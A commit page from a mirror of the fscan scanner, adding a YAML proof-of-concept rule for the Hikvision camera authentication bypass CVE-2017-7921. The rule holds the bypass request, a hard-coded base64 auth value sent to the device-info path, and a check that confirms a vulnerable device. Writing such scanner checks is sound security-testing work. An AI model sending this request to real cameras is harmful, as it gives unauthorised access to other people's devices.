mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-27 05:31:53 +08:00
更新 CheckErrs
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-hikvision-cve-2017-7921
|
||||
rules:
|
||||
- method: GET
|
||||
path: /system/deviceInfo?auth=YWRtaW46MTEK
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"<firmwareVersion>") && response.headers["content-type"] == "application/xml"
|
||||
detail:
|
||||
author: whwlsfb(https://github.com/whwlsfb)
|
||||
links:
|
||||
- https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
|
||||
Reference in New Issue
Block a user